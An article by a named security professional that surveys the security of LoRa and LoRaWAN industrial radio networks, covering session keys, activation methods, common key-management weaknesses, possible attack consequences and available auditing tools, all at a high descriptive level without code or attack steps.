Cybersecurity Survey of LoRa and LoRWAN Industrial Radio
By Leonard Jacobs, M.S. in Cybersecurity Technology, CISSP, CSSA
This is the first article in a series of articles discussing cybersecurity of industrial control wireless technology.
LoRa (Long range Radio) is a physical proprietary radio communication technique. It is based on spread spectrum modulation techniques derived from chirp spread spectrum technology. It was developed by Cycleo, a company of Grenoble, France, and later acquired by Semtech. LoRaWAN defines the software communication protocol and system architecture.
LoRaWAN is a low-power, wide area networking protocol built on top of the LoRa radio modulation technique. It wirelessly connects devices to the internet and manages communication between end-node devices and network gateways. It is often utilized in geographically dispersed manufacturing facilities. It has even been known to be utilized in agriculture applications.
LoRa radio is capable of sending data or control signals over a distance of 12 kilometers when line of sight conditions exist.
The LoRa Alliance, the non-profit organization behind the LoRaWAN standard, declares there are currently well over 100 million devices using LoRaWAN all around the world and it estimates that the number will reach 730 million by 2023.
In a LoRaWAN architecture, endpoint devices communicate with applications via gateways and network servers. Endpoint devices exchange messages with gateways via LoRa and LoRaWAN protocol, and the gateways communicate with the network server via TCP and UDP. The network servers route traffic from endpoint devices to applications and they are also responsible for authentication and authorization.
The most widely used versions of the protocol are 1.0.2 and 1.0.3. However, the latest version is 1.1, which provides several improvements to the protocol’s cybersecurity.
LoRaWAN utilizes network-level security to guarantee the authenticity of a device on the network, and application-layer security to stop access to data exchanged between an endpoint device and the application server. These layers rely on secrets called the Network Session Key (NwkSKey) and the Application Session Key (AppSKey) to ensure protection.
LoRaWAN protocol uses two methods for initial device activation and communication with the server:
- Activation by authorization (ABP), which includes hardcoding both session keys and other device identification data in the firmware.
- Over-the-Air Activation (OTAA), involving configuring an AES-128 root key called AppKey that is unique for each device. The AppKey is used to sign the messages exchanged when a device joins a network.
The cybersecurity of a LoRaWAN network is dependent on these keys being kept safe. Despite the fact that version 1.1 of the protocol introduces cybersecurity enhancements over earlier versions, LoRaWAN systems are often exposed to attacks due to implementation issues and poor key management.
Cybersecurity researchers have found that keys can be extracted from devices through reverse engineering. Many endpoint devices have physical tags containing vital information such as the AppKey. These tags should only be used in the commissioning process. If the tag is not removed after commissioning, a physical attacker gains access and the information on the tag can be used to generate session keys.
Researchers have also discovered source code that includes hardcoded AppKeys, NwkSKeys and AppSKeys. These keys should normally be replaced when an endpoint device is deployed. Furthermore, AppKeys may not be sufficiently cryptographically strong, making it easy for attackers to guess them.
Other cybersecurity researchers have reported finding many internet-exposed LoRaWAN servers that use default or weak credentials, making it easy for attackers to access these servers and obtain the keys. Servers can also run software with known vulnerabilities or they may not be configured properly, which also allows attackers to obtain the keys.
Cyber-attacks can have serious consequences in control systems. If communication between a smart water meter and the network is compromised, malicious actors could manipulate the billing for the utilities. Likewise, an attack on a highway monitoring sensor could affect motorists’ safety and security.
Keys can also be obtained by breaching the networks of device manufacturers, attacking the devices used by technicians to configure LoRaWAN systems, and breaching service providers.
Once the attacker has obtained the keys, they can launch denial-of-service (DoS) attacks against devices and the network server. Attackers could also send fake data to the network, which could have serious consequences in industrial control networks where industrial control processes could fail; e.g., chemical manufacturing formulas could be ruined. The technology has been found to be used in Smart Cities applications; e.g., traffic signaling controls, street lighting controls due to its low power wide area networking capabilities.
Security tools for LoRaWAN technology released in 2020 are few and far between. A major cybersecurity firm released a framework called LAF (LoRaWAN Auditing Framework) and provided a tool that can parse, send, craft, analyze, and audit a setup and crack some LoRaWAN packets using weak/default keys. This framework still has some limitations to overcome such as:
- It only works with a gateway
- It can only listen to uplink packets
- It can only listen to 8 out of 64 channels
- Generation and fuzzing depend on LoRaWAN (Go) using an inflexible format such as JSON
Another tool is called “LoRa Craft”. It intercepts packets using Software Defined-Radio, and craft packets using dedicated LoRaWAN v1.0 and v1.1. This tool is mainly do-it-yourself and needs much more support than those already released, like crypto helpers for Join-Accept payloads and Message Integrity Code (MIC) to help crack weak keys.
A newer framework called ChirpOTLE that is capable of demonstrating two attacks affecting the availability of LoRaWAN networks like time drifting in LoRa class B, and a novel Adaptive Data Rate (ADR) spoofing attack to manipulated frame metadata. Researchers are limited in their setup by choosing only a few default channels to demonstrate their attack with each node.
This shows that while security solutions are being developed, comprehensive and easily accessible protection for LoRaWAN still has a distance to go to be more secure.
For more information on this topic, see: link